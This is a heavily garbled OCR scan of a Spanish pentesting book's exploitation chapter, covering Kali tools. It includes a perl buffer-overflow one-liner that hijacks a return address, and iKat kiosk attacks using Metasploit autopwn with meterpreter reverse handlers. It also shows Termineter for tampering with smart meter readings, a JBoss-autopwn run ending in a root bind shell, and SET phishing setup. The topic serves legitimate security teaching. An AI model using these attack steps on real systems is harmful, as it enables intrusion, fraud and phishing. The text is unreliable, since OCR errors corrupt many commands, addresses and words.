objdump  se  puede  obtener  las  direcciones  de  memoria  donde  empiezan  las  funciones  tal  y  como  se 
puede  apreciar  en  la  imagen.  La  instruction  que  se  ejecuta  es  objdump  —d  <nombre  aplicacidri> 


080 4944c 

^>reraio> : 

804944  c:  ‘ 

55 

push: 

%ebp 

8G4844d: 

B9 

35 

mpv 

%ssp  ,%ebp 

304844 f: 

83 

ec 

19 

sub 

$0jtIB,%aBp 

8G48452 : 

c7 

04 

24 

10 

05  04  08 

fllQVl 

$9x6040510, (%esp) 

0048459: 

eB 

d2 

fe 

ft 

ff 

call 

0048339  <puls@plt> 

804845s : 

c9 

leave 

_ LL 

_ C£I _ 

Imagen  04*28:  Obtcncion  de  la  direction  de  memoria  de  premia. 


l  na  vez  que  se  dispone  de  la  direction  de  memoria  donde  se  encuenlra  la  funcion  premia,  la  cual  es 
0x0804844c,  se  puede  generar  la  entrada  maliciosa  que  busca  modificar  la  ejecucidn  de  la  aplicacidn. 
l  a  cnlrada  serin  76  caracteres  de  bytes  no  importantes  que  iran  sobreescribiendo  la  memoria  de  la 
pi  la  y  a  partir  del  byte  77  comienza  la  direction  de  retorno  que  ejecutara  el  Ell*  En  esta  posicibn  se 
debt  introducir  la  direccidn  de  memoria  Ox 08 04 844c.  en  fonnato  little  endian. 

rootfkali  perl  -e  'print  ,,8"x76  .  '■\x4c\*94\,*04\x9B" '  .  /poc 

El  flujo  de  CQtfigo  ha  side  modi  fit  ado 
VI disc  ion  de  segment o 

reotflkalls-#  I  _ _ _ 

Imagen  04.29:  Ejecueion  de  entrada  malic  iosa  con  el  lin  de  cambiar  el  flujo  del  programa. 


Una  herramienta  rrsuy  interesante  para  debuggear  ejeeutables  y  librerias  (DLLs)  de  sistemas 
Windows  es  Ollydbg .  Esta  herramienta  se  eneuentra  disponibie  en  la  distribution  Kali  Linux  a  traves 
de  WmeWLw  la  imagen  se  puede  visualizar  Oily  dbg  comend  o  en  Kali  Linux. 


Imogen  04  JO:  Ejeeueion  de  QUytlbg  en  Kali  Linux. 


i 


122 


Pentesting  con  K\ i/j 


( )ti  ii  herramienta  delframework  de  Metasploit  cs  msfpescan  conia  que  sc  puede  anali/ar  informaejft 
del  ejecutable  y  buscar  tnstrucciones  y  en  qu£  directories  se  encuentran,  Gracias  a  la  henamithUu  $ 
puede  recopilar  informaeion  como:  Tm 

-  DLL  Characteristics . 

Funciones  importadas, 

-  Cabeceras  y  sus  opctones. 

Direcciones  virtuales  del  codigo  y  dates. 

b.n  la  imagen  se  puede  visnalizar  la  cjeciicion  de  la  instruccion  msfpescan  -i  <nombre  ejecwablo 
para  obtener  la  informaeion  de  este,  Otra  instruccion  interesantc  es  la  de  buscar  instrucciones  de 
salto  a  ciertos  registros  con  el  parametro  /, 


Oil  Characteristics 


Flag 

ASLR 

3inb 

Integrity 

Isolation 

NX 

SEN 

Terminal 

toon 


Value 

T  rue 
False 
False 
False 
T  rue 
False 
T  rue 
Fal  se 


rip  anted  Functions 


Library 

ADVAPI32.dll 

ADVAPI32.dll 

ADVAPI32.dll 


Address 

0x004IdGG3 

9x0041d07c 

GxGG41d004 


Ordinal  Nane 


87 

621 

506 


ClosaServiceHflncfle 
RegQueryValueExA 
0  pen  Th  re adT  ok e n 


Imagen  1)4.31 :  Informaeion  de  ejecutable  obtemda  eon  ms  foes  can. 


Network  Exploitation 

HI  aparlado  de  Network  Exploitation  que  se  puede  encontrar  en  Aplicaciones  -  >  Kali  Linux  -  > 

Herramientas  civ  Explotacion  proporciona  una  seric  de  herramientas  de  explotacion  de  diverse 
ambito: 


-  Henramienta  para  testear  equipos  con  dkeccionamiento  IPv6,  M 

-  Herramienta  para  testear  el  servidor  de  aplicaciones  JBoss.  fl 

Herramienta  para  testear  entomos  restringidos  como  terminates  Cirri* ,  IVebTl  s,  e  litre 
otros,  I 

-  Herramienta  para  testear  el  acceso  a  medidores  de  luz.  Este  tipo  de  herramienta  llama,  y 
mucho,  la  atencion  de  I  os  hackers,  ya  que  se  puede  poner  a  prueba  en  el  mundo  real.  fH 


Exploits  v 

pstn  herramicnta  permite  al  pentester  realizar  una  serie  <ie  comprobaciones  en  etiiontos  domic 
cl  direccionamiento  IPv6  se  encuentra  habilitado.  Hay  quc  rccordar  que  por  defecto  los  sisters 
operativos  modem  os  de  Microsoft  Windows ,  los  l 'bantu,  el  propio  kali  Linux,  disponen  do  c^ic  opt 
de  diteccionamiento  por  defecto. 

4ntes  de  explicar  la  sintaxis  de  la  herramicnta  se  especifica  donde  se  puede  encontrar  la  direccidn 
IPv6  en  una  adaptador  en  Kali  Linux.  Mediante  la  ejecucion  del  comando  ifconfig  se  obtiene  la 
jnformaeion  correspondiente  a  las  interfaces  de  red  que  existen  en  el  equipo. 

rnatgkali:  ifconfig 

eth0  Link  encap  ; Ethernet  HWaddr  GS  :03  ;27  :  f4:8e  :lf 

inet  add r : 192 „ 168 .  GL  57  Beast : 192 . 168 .0 .255  Wask :255 . 255 . 255 .0  1 
_ inste  add r :  feB0:  :fl06:27ff  :fef4.;8sif/64  Scope :Link _ 

Irnagen  04.32:  Obtencion  de  !a  direccion  IPv6  en  Kali  Linux . 

l  a  herramienta  exploit 6  se  encarga  de  realizar  el  siguiente  tipo  de  pruebas  a  un  target  con 
direccionamiento  IPv6,  conectividad,  checksums,  coniprobacion  de  las  \  ulnerahilidades  CVE-2003- 
0429  bad  prefix  lenghl ,  CVE- 2004-02 57  como  se  puede  visualizar  en  la  imapen. 

roolgkaU:-*  exploit®  eth0  feflG:  :9  ft  :Sn4  :52ea  :aa0c~~ 

Porfortling  vulnerability  checks  on  faB0 :  :9fc  :Ba4 :52©a  :aa(te  via  ethft 
Test  Q:  normal  pings  PASSED  -  we  got  a  T«piy 

last  1:  CVE ‘NONE  ovorlerge  ping,  §  checksum  combinations 

Warning:  checksums  for  packets  >  65535  are  unreliable  due  inplanwi  at  ion  diMM^ 
n ceE  on  targe?  pi  at  forma 

Test  2:  CVE  NONE  large  ping,  3  checksum  combinations 

Warning:  checksums  for  packets  *  65535  are  unreliable  due  implementation  differs 
nces  on  target  platforms 

Test  3:  CVE-20Q3-S429  bad  prefix  length  (little  information,  Tplementat ion  uns 

ure 

Test  4:  CVE -2004  0257  ping,  send  tooblg  on  reply,  than  SVN  pk L 

Test  5;  normal  plnoE  (still  alive?)  PASSED  3a<  a  reply _ _ _ 

fmagen  04,33:  Corn  probation  sobre  un  target  con  exploits 


iKat 

iKat,  The  Interactive  Kiosk  Attack  Tool ,  es  mis  m&gnifica  herramienta  para  realizar  pea  testing 
a  entomos  restringidos  como  pueden  ser  los  terminates  C  itrix*  Kioskos  de  servicios  de  aceeso  4 
Internet,  directories  en  aeropuertos,  maquinas  de  impresion,  las  WehTVs.  etcetera.  La  herramienta 
fue  desarrollada  por  Paul  Craig * 

Esta  herramienta  esia  basada  en  una  gran  idea,  a  la  vez  que  sene  ilia,  permite  a  los  usuanos  dc 
los  Kiosk  nave  gar  desde  estos  hasta  un  servidor  configurado  el  cual  proportion  a  ra  cienas  acciones 
para  explotar  el  Kiosk,  Un  ejemplo  rapido  y  sencillo^  un  usuario  llega  a  una  maquina  donde  puede 
visitar  ciertas  paginas  de  Internet  El  usuario  tiene  configurado  en  una  direccidn  llJ  un  servidor  que 
proporciona  iKat  el  cual  al  acceder  permite  realizar  desde  dicho  navegador  una  serie  de  acciones  con 
el  fin  de  saltarse  la  seguridad  del  Kiosk.  Actualmente,  se  pueden  encontrar  versiones  para  Windows. 
Linux  y  una  version  denominada  PhotoKA 7  implementada  para  explotar  sistenias  que  permitan 
msertar  un  dispositive  USB. 
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Pen  testing  con  Kali 


La  implementation  de  esta  herramienta  estfi  basada  en  un  modelo  cliente-servidor  en  el  que  |(>s 
payload  que  se  cargan  en  el  kiosk  pod  ran  realizar  una  conexidn  in  versa  haeia  el  servidor  iKat,  y  de 
esia  manera  realizar  la  fast  de  post-explotacidn.  La  utilizacibn  del  protocolo  SMB  para  cargar  cl 
agente  ikaLexe  en  el  kiosk  tambi^n  es  muy  interesante-  >■ 

Ademas,  la  integration  eon  Metasploii  Browser  Autapwn  y  las  nuevas  tecnicas  permiten  una  gran 
variedad  de  test  que  real  bear  sobre  Los  kiosk, 

/ 

Proof  Of  Concept:  Vigilando  el  kiosk  con  iKat  1 

En  esta  prueba  de  concepto  se  propone  el  siguientc  esc c nano; 

Puesto  o  Kiosk  en  un  museo  donde  !os  visitantes  pueden  eonsultar  informacidn  a  traves 
de  la  navegaeion  web. 

Un  atacante  ha  preparado  el  servicio  de  iKat  que  incorpora  la  distribution  Kali  Linux, 

-  El  atacante  se  enfrenta  al  Kiosk,  el  eual  dispone  de  Windows  XP  por  lo  que  parece 
aparentemente. 

En  primer  lugar  el  atacante  configure  el  servicio  mediantc  la  ejecucion  del  comando  iKat,  C’abe 
destacar  que  tras  la  ejecucidn  del  comando  se  abrira  una  ventana  en  un  entorno  grafieo  basico 
donde  se  puede  configurar  las  interlaces  de  red,  por  donde  iKat  reeibira  las  peticiones,  Este  hecho 
es  importante,  ya  que  la  interfaz  debe  disponer  de  conectividad  eon  Internet,  para  que  cuando  el 
atacante  se  coneetc  desde  e!  Kiosk,  esle  pueda  llegar  hasta  el  servicio,  Como  es  bien  sab i do,  si  iKat 
se  eonfigura  en  un  entorno  casero  o  laboral  hasieo  se  debera  abrir  un  puerto  del  router  para  conseguii 
que  desde  el  Kiosk  se  tenga  conectividad  con  el  servicio. 


Imogen  04,34;  Ejccucmn  de  iKat.  Imagen  f>4,35:  Ccmfiguraci6n  dc  tarjeta  de  red  pa tm  iKat 

l  na  vez  que  el  pentester  se  encuentra  en  el  Kiosk*  este  se  conecta  al  servicio  y  puede  visualizar  un 
sitio  web  como  el  que  sc  puede  ver  en  la  imagen.  Una  breve  descripeion  indiea  el  objetivo  de  iKat, 
y  cuaies  son  sus  funcionalidades,  El  logo  del  sitio  web  puede  llamar  bastante  la  atencion,  sobre  todo 
al  genera  masculino. 


iKAT  Desktop 
Host  Add  ress: 


iaap»HH3.  v  -n 

■ 


192.16S.0.59  — 


TCP  Port  To  Bind  On: 


8080 _ 

Internet  Access 

L  T1  r  ii  i  iP.UdT 

Start  iKAT 


root{dkali:/u  h.r  #  ikat 

/  \  l_l  \f  \  /  \ 

\J  <  /  /  \ 

ri  i 

$'■11  f  V  ! 

\  f 

i_[ _ l_  v _ i 

/  w 

\f  /' 

v2Ql3  -  Desktop  Edition 

Developed  by  the  'King  of 

Kiosk  Hacking' 

Paul  Craig  paul^ha , eked .net 

[+]  Loading  IKAT  For  Linux 
[+]  Found  network  interface: 

192 . 163 .0 .59 

f  il  l-a»nri  nflfwnrte  interface: 

13?  fl-fl  1 

Capitulo  /  V  Explot acior} 


/ 
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iKAT  was  designed  In  aid  security  consultants  wilh  the  task  of  auditing  the  security  of  browser  controlled 
environments  such  as  Kiosks,  Cilrix  Terminals  and  Web  TVs  by  providing  methods  to  access  Ihe  underlying 
operating  system  and  automatically  escalate  local  privileges 

This  is  the  af  iKAT  and  is  100%  free  to  use  -  however,  modifications  fo  iKAT,  ihe  MAT  Logo,  or  any 

of  the  IKAT  tools  Is  explicitly  not  permitted.  IKAT  Professional  is  available  from  Ihe  and  allows  you  to 

modify  the  took  and  feel  or  iKAT  along  wilh  a  suite  of  other  new  Hicks  and  attacks 

Available  Versions: 

u 


Imaged  0436:  Navegacion  dcsde  el  Kiosk  ai  sitio  web  tKat  malicioso  del  ataeantc. 


El  sitio  web  dispone  dc  un  listado  dc  opciones  muy  interesantes.  En  cada  version  iKut  aumenta  sus 
I'uncionalidades  otorgando  al  pentester  un  suriido  de  pmebas  para  verilicar  la  segnridad  de  dichos 
entomos.  Hay  quo  recordar  quo  este  lipo  de  entomos  no  suelen  estar  actual i /ados,  aunque  cada  dia 
los  responsables  de  !os  Kiosk  estan  mas  al  tanto  de  asegurar  los  mismos. 


Auto  ’Exploitation-  ' 

Reconnaissance  — 

Automat®  Exploration  of  an/  oromer 

based  emirument 

roots  for  determining  information  about 
ymt  target 

File  System  Links  — ► 

Common  Dialogs— 

A&tess  the  focal  m&ytiem  to  reveal 
useful  riles-  and  directories. 

op-WJ  GOmnWh  Dialogs  sued  as 

Faetopen,  Ftf&Pm  Fife/Save  etc. 

|  UR!  Handlers  — ► 

Flie  Handlers  — 

roots  tor  ctefefrmmg  /nfornmion  about 
your  target 

^numerate  a/  registered  Ftse  Handlers 
and  spawn  me  dandling  application 

Browser  Addons  — 

FireFox  Resources— 

B«jww r  pfugtos  wo  addons  to  m 
your  exptoHMion  attempt  i 

Tom  tor  mrnmmrfQ  >ntormm>Qr\  aoout 
your  target 

IKAT  Toolt— * 

Crash  a  Kiosk  — 

4  Qcuftip&te  armory^of  tools  designed  to 

Attempt  to  Cr&sft  me  k.mnK  and  gsm 

imagcn  0437: 1  j&tado  ck  opciones  dc  iKat  para  rcali/ur  eti  el  sistema. 
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Pentesting  con  Kali 


A  conti  nnnciun  se  muestra  una  labia  con  cl  listado  de  opciones  principales  que  proporcinna  iKaf: 


Opciones 

Descripcldn 

A  utoExploitation 

Lanzamiento  de  un  conjunto  de  exploits  para  aprovecharse  de 
vulnerabilidades  del  navegador  del  Kiosk. 

Reconnaissance 

Herramientas  para  recoiectar  information  del  sistema  operative, 
navegador,  versions,  todo  lo  relacionado  con  el  target. 

File  System  Links 

Acceso  a]  sistema  de  archives  del  Kiosk,  pudiendo  exam inar  archives 
y  directories  privados. 

URI  Handlers 

Herramientas  para  determinar  informacidn  acerca  del  target. 

i Kat  Tools 

Conj unto  de  herramientas,  con  los  que  se  pueden  descargar  ejecutables 
y  Januaries.  El  objetivo  de  esta  accion  es  con  seguir  ejecutar  un  payload 
que  pueda  intcresar  al  pent  ester 

Crash  a  Kiosk 

Ejecucidn  maliciosa  con  el  fin  de  denegarel  servieio  del  Kiosk. 

Tabla  04.02:  Opciones  principalis  de  iKaf  y  descripeion: 


IK  AT  Desktop,  m^f  console 


S''W  s t  ar  twi . 

Start log  «*pJott  iJindoMSi^Vowse^/uiniip.f ileview  with  pjtylowj  windows/Mterp 

Lb  »_tcp 

Using  m;  http* //V& .168,0, S3 :S092/K«rP»Y 
Server  started. 

Start  in®  exploit  windt^/brawsBr/wftS.athiiintoolf  uLth  payload  windows/meterpr 
<)r’\  e*u«r»_tcp 

Lit  s  nc,  URL :  http  %/mi  ,168 .  Q + 59 ;  6092/mE *F  j  aekh j  F 
Server  started « 

Starting  handler  for-  wjndQijJS/meterpreter/r&verse.fccp  on  port  6082 
Siting  handler  for  v mdows/het Sr pre ter/ reverse. top  on  port  6066 
Started  reverse  handler  on  192,166.0.53:6002 
Starting  the  payload  handler,., 

Sorting  handler  for  java/meterpreter/ravers#  tcp  on  port  SOB! 

Started  reverse  handler  on  132,168/1.59:6085 
Starting  th*  payload  handler,,, 

'Started  revert e  handler  on  192.160,0.59:6081 
Starting  the  payload  handler... 

—  Hone.  Found  19  exploit  modules 

Using  U^.:  http ://192. 168, 0.59 :6Q92/autc£wi 
Server  i tar ted. 


Imaged  04.38:  Con  sola  que  muestra  la  interne  cion  entre  iKaf  y  msfcotisole  para  browser  an  top  w. 


Antes  de  seguir  hay  que  hacer  h incap ie  en  [a  configuraeidn  automitica  en  el  servieio  iKaf  de  la 
tccnica  Browser  Auiopwn  de  Metasploit,  Automaticamenle,  al  arrancar  iKaf  configura  Jos  modulos 


pmvocnr  que e\pentester  encuentre  una  v  ia  de  mteraccion  can  el  entorno  eon  privileges  interesantes. 

Una  de  las  ejemplos  llamativos  es  cuando  el  pentester  utiliza  la  ope  ion  File  System  Links  para 
aceeder  a  los  recursos  de  red,  al  sistema  de  archives,  panel  de  control,  etcetera.  Se  puede  visualizar 
en  la  imagen  coino  el  servieio  proporciona  los  links  neeesarios  para  pegantlolos  en  la  barra  de 
direceiones  aceeder  a  los  recursos,  Para  pegarlos  se  neeesitara  dispnner  del  teclado  en  pant  alia,  que 
mas  adelante  se  vera  como  conseguirlo. 
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Qapiwio  IV.  Exploration 


FMe  System  Links 

rfMBW  Meat  JmKysrtffl  to  r&t&a! 

useful  files  *nd<fffetiorm 

Links  you 
Copy/Pasta 

UKiuf  URLs  to  enter  into  n 
browser  addtvi  a  t  ^ 

Shell  UR  I  Handlef 
Links 

AS  at  the  nttystermf 
Windows  Sifted  URt 
tetiyfiera  vow  can  enter  tftfo 
o  trow se^  address 


Shell  Handler  Links 

V 

a  m  i y  shMhanom  \jri%  #j  «h h  Uflf  to  to  mw*  rw 

ytfefwt  zcv**  yw  w>#  need  to  stepMI  saoft  ipi  *nto  mi  tt***tt  jIw 

Tfis  totodfiie  URfel  aftoutt  JK  fflfffJW  iVKO  yowr  &rw®wr  VRil  witty  tier  fly  MHfl 
f.ic  maflxw  wwrony  wort  if  you  fahr  *  UPt  witty  oaf 


’STrere  J  {2 1  EC  2020-  3AEA- 1 069-A3DD-[JBOP3B3C)3tl9C)] 


shell  f357flfi^3C-B0 75-4369-  B  flOD-  02  907SE  1 1CQT| 
j Sties  l20fiD2C6CuaAEA-taS»A2C7-0etJQ2B3t]^aEjD  \ 


:  she  SI  ( 7  0  f  7 ACC  7-32  q  2- 1 1OT-AA&2-00SBSFC  1 270E- 


sued-  ' 20004 F E0-3ftE4  lQ69-A?DB-nqflCflB3fl 3Q3D | 


j5he<l  ,  (45QD9FBA- AD25- 1  1  DD-9aAB-QB0036 1 Bt  f  D3| 


Imager  (14.39:  Codig  os  para  el  navegader  y  eonseguir  aecesn  a  sitios  impurtarites. 


s  tnfttttiAdiin  iie-  (tofatfro 
jrugar  u  rjuJ  if  fmawm 
dj'ibf  ji  urid' .-cnh»»«cton 


ArdllVW  a!  mac^nario  s  en  tstc  c  quipo 


a  Documentos  cwrpartidcjs 

IfnSdddn  d*  ditto  duto 

taco- bed  tCi) 

ivij-l  coo  utawKenomtento  ewfcrflW*1 

Urtd«fdeCOCO,i^ 


Documantos  de  Adnunistrodor 


Imagen  04.40:  Copiar  y  pegar  la  instruction  en  el  navegador  se  obtiene  access  a  Mr  PC. 


Otra  de  tas  opciones  inleresantes  que  el  pen  fester  puede  Uevar  a  cabo  es  la  recogida  de  informacion 
del  entomo.  En  la  imagen  se  puede  visualizar  que  tecnologias  se  encuentran  habilitadas  en  el 
navegador,  las  variables  de  este,  las  variables  globales,  etcetera,  Ksta  option  es  muy  importante  a  la 
hoia  de  conocer  el  entomo  que  se  esta  auditando. 


Reconnaissance 

Local  Browser  Variables 

ra*  fu¥  SJrtfr"«V®  $B&A 

tOUrJa>gpf 

Cfiirff-d  HicU.  HitKW 

Ttrget  lnl»rrmKion 

/ 

frcHt-ill  ii  tm/Jti  eU  |rUb  CHFI 

O'DICEvKlfir.L 

*0 1  rT.-y  iw.jn  urn  Inc 

.‘n.n-  ci'L-t-  RUdLI  &MTJ 

Atlhto-  M  cntfaii 

Riitiolt  t»rv*! 

Fsnhni  nindrrt 

Vmiibl«i 

m  Won  Venn  pi  *fw  t  HUlamd 

tte-ULlm  w  rynwrtlCr 

■!frt»EOfP  Wf  »w 

Ol4*«  H  Ml4w1  IJ1T4  M*r*s|  1,ipllu  MUihl 

■utfwidmittMH  *iw 

tjMf  aQfffi  MiWur 

kimr 

Ofobil  FMth 

MAvq m*  tptiHim  wv  rnn.ni  urnirnm  r  nt -nintr 

■*4ttag> 

■Jiri^r  nrj*  JudAeiWi 

WWtlBft  4  D  [l^rtpitFTT  UTIK  4,  Q.  '^lliji>to  HI  B  1. 3VL] 

OtnM  -.*rr-rjr  It 

1 

'•Hwrqntix  F'lMThrtn  Wn.i? 

Fife  Riflfillan 

Htoigclrj-  LhtH'Hlprt  Mii..|j.J  0  |CB«ttHk  MSC  3  WI  rJWn  ^  j  | 

W5| 

Fir  Tito:  r nr  wu*  ntM  you 

“!*■«  It 

K'riHWMrt^K 

Tmagen  04,41 :  Recogida  de  inform aciofl  cn  d  Kiosk. 
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Pen  res  ring  con  Kali 


Pern  quiza  una  de  las  opciones  mSs  importantes  y  que  mayores  resultados  aporte  es  ia  de  iKat  Took 
Tal  y  como  se  puede  apreciar  en  la  iniagen  existe  un  lest  para  comprobar  la  posibilidad  de  descargar 
archives  y  ejecutarlos,  con  lo  que  la  ejecucidn  de  shetlcodes  seria  un  exito,  Por  olro  lado,  se  puede 
pretender  ejecutar  ciertas  aplicaciones  o  recursos  interesantes  como  puede  ser  una  cmd,  j 


t 


IK  AT  Tools 

A  Strmjry  of  (OOS  Pthiigix-xi  to 

Qftyo Uf  v  ypkJMafian  attempts; 

Test  Download 
Ability 

Try  art  methods  of 
a&mfQaHirig  tries  lo  ste 
Which  method  works  best 

Biliary  Tools 

N&tMe  wrptW  tuparies  tor 
various  &ipioi&fion  tasks 

Unlocked  Binaries 

T  tm-  fQOtJmhg  fries  have 
bean  pafnherj  to  jpfore 
arty  iocat  •.•L-L<j/!iy  pat/nies 
s-upri  s?s  logs)  Group 
Policy  Alieinpis  bir*e  aJi'o 
been  mane-  to  aypp$3 
hash,  c-ert.rv  jte-  && 


IKAT  Tools 


r  I'  r  if  Iff  u  VI  U  M IU  LU  1 1'l  at  - - — — - 

1  r™  Hinary  [  exe| 

2.  Duwnioarf  Tife  using  Che  Flash  downbadURi,,  object  [Flash] 

frhiE,  dfcumvshl  *  bmwsflrt-  winch  disable-  file  downed. :lfrg  Ibriwtih  a  browser 
ESDLHiEy  p-nhey) 

3  Tty  to  download  the  Til*  using  407  allTretlt  mirne  types  [Mlmfcj 


Fur  more  inform ahtlo-n  on  each  The  muurje-QVEr  the  ftlgngme 

Command  Shells 

iKAT  AgernE 

f  cxel 

Flash] 

tMirneJ 

P  uchen  CMD  ext- 

[.ate] 

F  lash] 

[Mimef 

CMO.exa  in  a  DLL  File 

1  cisa 

Fiash] 

[Minna] 

Mon-Console  Ea&etf  CMD 

[  OX&] 

F«ash] 

[Mime] 

Mass  Application  Ex*CU?Of 

I  ewe] 

F^ash] 

[M.-rms] 

Command  Shell  De-ouri 


[  [I  lash;  [lylmie] 


Imagen  04.42;  I  lerraroicntas  dc  IKat  para  inicntar  lanzar  en  cl  Kiosk. 


ArcNvo  Tectado  ConHguraciin  Ayuda 


w  Teclddo  pit  piinicilla 


L"  1 "  1  •  I 

□ 

□ 

Ld 

Ld 

LLLd 

Lei 

+ 

/ 

■ 

-  | 

nr 

8 

8 

* 

4 

5 

6 

i 

2 

3 

en! 

0 

Iraagen  04.43:  Obtencion  de  de  memos  tras  k  ejeeucion  del  payload. 


Termineter 

Term  meter  es  m  framework  de  codigo  libre  el  cual  se  encuenlra  eodifieado  en  Python  y  permiie  a 
cualquier  usuario  eonectarse  a  los  medidores  digitales  de  electricidad  o  Smart  Meter  (medidores 
intcligentes)  que  estan  instalados  en  los  hogares  por  las  companias  de  electricidad.  Estos  medidores 
perm i ten  a  las  compart  i  as  revisar  el  consumo  electrico  de  manera  remota,  sin  necesidad  de  que  on 
empleado  acuda  al  lugar  donde  se  encuentran  los  contadores.  ■ 

Ter  mine  ter  se  puede  uti  lizar  para  modi  bear  el  software  dd  contactor  o  medidor,  y  reducir,  por  ejemplo* 
las  tarifas  que  los  usuarios  pagan  por  la  electricidad*  Tambien.  sencillamente,  se  podria  ordenar  al 
contador  que  in  Ibrme  que  ha  habido  men  os  consumo.  La  aplieacion  fue  liberada  a  mediados  en  20 1 2 
y  es  toda  una  revolution  en  la  explotacion  de  este  t  ipo  de  aparatos.  La  aplicacion  se  conectaria  a  I 
medidor  o  Smart  Meter  a  traves  de  una  inter faz. 


Cupi n< to  IV  Explotacion 


Implementa  los  protocoled  de  comunicacion  02.18  y  C12.19  y  actualmente  sopona  los  medidores 
q0e  utilizan  la  Cl 2. 19  con  juegos  de  caracteres  de  7  bits.  Termineter  comunica  con  medidores 
mteligentes  a  trav^s  de  una  sonda  de  tipo  ANSI-2  optical  con  una  i nterfaz  serie. 

1  a  sin  taxis  es  muy  similar  a  la  de  la  tinea  de  comandos  de  Metasploit ,  aunque  Termineter  no  sc 
jncuentra  integrado,  a  dia  de  hoy,  con  el  framework  de  Metasploit. 

termineter  >  use 

3 rutafo  reel DQin  get^info  getsacurityinfo  set_mst©r  id 

dump_ tables  get_lng_info  raad_  table  setjneterjmjde 

enum_tables  gel _mo dam  info  run_p  roc  edu  re  write  table 

termineter  >  use  read  table 


termineter  [ 

)  >  info 

Name:  read  table 

Author:  Spencer  McIntyre  <smcint  y  rg^secu  restate  , net > 

Version:  1 

Basic  Options: 

Name 

Val ue  D  esc  rlpt i on 

TABLE ID 

table  to  read  from 

lasc  ript ion : 

This  modulo  allows  individual  taolus  to  be  read  from  the 
smart  motor. 


Imagen  (M  44:  Modules  disponibles  cn  tentthwter  y  smtaMs  del  framework. 


,,Sc  podrian  leer  tahlas  y  modi  (i  car  las?  La  respuesta  es  si.  siempre  y  cuando  sc  pueda  acceder  a  las 
uiblas.  La  inl'onnacidn  sin  embargo  estaria  en  modo  crudo  y  sin  analizar.  En  I ineas  generates,  el 
proyecto  es  tnuy  interesante  y  con  un  future  important  enfocado  a  la  seguridad  de  los  medidores 

intel  igentes. 

termineter  (  '  )  >  back 

termineter  >  help 

Type  help  <commsnd>  For  Information 
-1st  Of  Available  Commands: 

B L  sack  connect  exit  Info  logging  resource  set  use 

banner  disconnect  help  ipy  reload  run  show 

Imagen  04.45:  Ayucia  de  termineter. 


JBoss-Autopwn 

|'SUl  herramienta  es  otra  de  las  que  se  encuentran  en  el  pack  de  berramientas  de  explotacion  en  Kali 
m>lx  Dispone  de  versiones  para  atacar  a  servidores  Windows  y  Linux.  La  herramienta  se  puede 
“contrar  en  la  ruta  /usr/share/jboss-autopwn  donde  se  incluyen  de  los  scripts  necesarios  para  llevar 
8  cabo  cl  testing  de  los  servidores  JBoss. 


si  max  is  es  send  11a.  se  puede  utilizar  el  ej  ecu  table jhoss-Pnux  ojboss-win  para  lanzar  la  aplieacion, 
pt  e*  script  que  se  puede  encontrar  en  el  dircctorio  eoroentado  anteriormente.  Su  sintaxis  es 
<target>  <port><  Hay  que  reealcar  que  el  script  e.sh  es  para  sistemas  *NIX,  mientras  que  d 
npt  e2.sh  es  para  sistemas  Windows. 
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no 


A  eontimiaeion  se  muestra  un  ejcmpto  de  ejecncidn  so  bre  un  si  sterna  Linux'. 

[r<tot@kaii  jbossl#  ,/e.sh  192.168.1.2  8080  2>/dev/nuii 

[x]  Retrieving  cookie 

U1  Mow  creating  BSH  script,** 

( x ]  .war  file  created  successfully  in  /tmp 
[xj  How  deploying  .war  file: 

http://l92.168.l-2: 8080/browser /browser /browser ♦ j sp 
fx]  Running  as  user. . . : 

uid=G (root)  gid*Q (root)  groups=0 (root)  r 1  (bin)  t2 (daemon) f  3 (sys) , 4 (adm) , 6 (disk) , IQ (w 
heel) 

[xj  Server  unarae . . . : 

Linux  kali  X.X.X.,. 

[ I J  Would  you  like  to  upload  a  reverse  or  a  bind  shell?  bind 

[ij  On  which  port  would  you  like  the  bindshell  to  listen  on?  3133? 

[x]  Uploading  bind  shell  payload. . 

[x]  Verifying  if  upload  was  successful... 

-rwxrwxrwx  1  root  root  172  2009-11-22  19:48  /tmp /payload 
[x]  You  should  have  a  bind  shell  on  192.168.1.2:31337.. 

[x]  Dropping  you  into  a  shell... 

Connection  to  192.168.1.2  31337  port  [tcp/*J  succeeded! 

uid^O (root)  gid-0 (root)  groups-0 (root) , 1 (bin) ,2  (daemon) , 3 (ays) , 4 (adm) , 6 (disk) , 10  (w 
heel) 

Python  -c  'import  pty;  pty.  spawn  ("/bin/bash*1') ' 

[raotGkali  /]#  full  interactive  shell 


SE  Toolkit  J 

La  ingenierfa  social  viene  re  present ada  en  Kali  Linux  gracias  al  script  SET,  Social  Engineer  Toolkit . 

I  fay  que  recordar  que  la  ingeniena  social  es  la  via  por  cl  que  un  atacanic  manipula  el  nutndo  que  sc 
le  presents  a  un  usuario.  para  que  estc  piense  que  dicho  mundo  es  legitimo.  De  esta  forma  el  a  la  can  te 
pretende  recolectar  informacion  sensible  de  la  victima,  como  pueden  ser  las  credenciales,  cookies, 
realizar  escalada  de  privilegios,  etcetera. 


El  principio  de  la  ingeniena  social  es  que  la  parte  mas  debit  de  todo  sistema  es  el  usuario,  es  por  elto 
que  concienciar  a  estos  debe  ser  una  de  las  priori dades  de  toda  empress.  Los  medics  que  e!  ingeniero 
social  utiliza,  generalmente,  son  el  Lelefono  e  Internet.  En  cierto  tipo  de  auditorias  tainbien  puede 
ser  valido  hacerse  pasar  por  otros  compafieros  de  trabajo,  con  d  objetivo  de  sacar  el  maxi  mo  de 

informacion. 


SHTes  un  aplieativoo script  escrito en  lenguaje Python,  se encuentra  alojado  en  lasiguiente  ubicacidn 
mer/share/sef.  Aunque  se  puede  invocar  desde  cualquier  ruta  ya  que  se-toolkit  se  encuentra  en  1* 
variable  SPATH.  SET  proporciona  un  entomo  seticillo  de  utilizar  para  preparar  todo  tipo  de  ataquei 
de  ingenierfa  social,  e  incluso  automatizacion  del  framework.  Se  Integra  con  Metasphit  lo  4ue 
le  proporciona  tin  gran  potential  y  liexibilidad  en  el  momento  de  preparar  los  distintos  a  tuques 
Ademas,  tambien  sc  Integra  a  Fast-Track  como  kit  de  automatizacion  para  procesos  dc  explotacion 
con  MetasploiL 
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gj  fichero  de  configuraeion  de  SET  se  encuenira  en  3  a  rutu  /usr/share/set/config  y  se  denomina 
t  Existen  direct ivas  en  cl  fichero  de  configuraeion  de  SET  irmy  interesantes,  algunas  de 
*|lgs  se  enumeran  a  continuacion: 

.  DMSSPOOF .  Fs  interesante  estudiar  esia  tecnica  para  realizar  un phishing  controlado  por 
el  atacante  en  todo  instante.  Esta  directive  indica  que  henamienla  realizard  la  tecnica  do  DNS 
W"  Spoofing. 

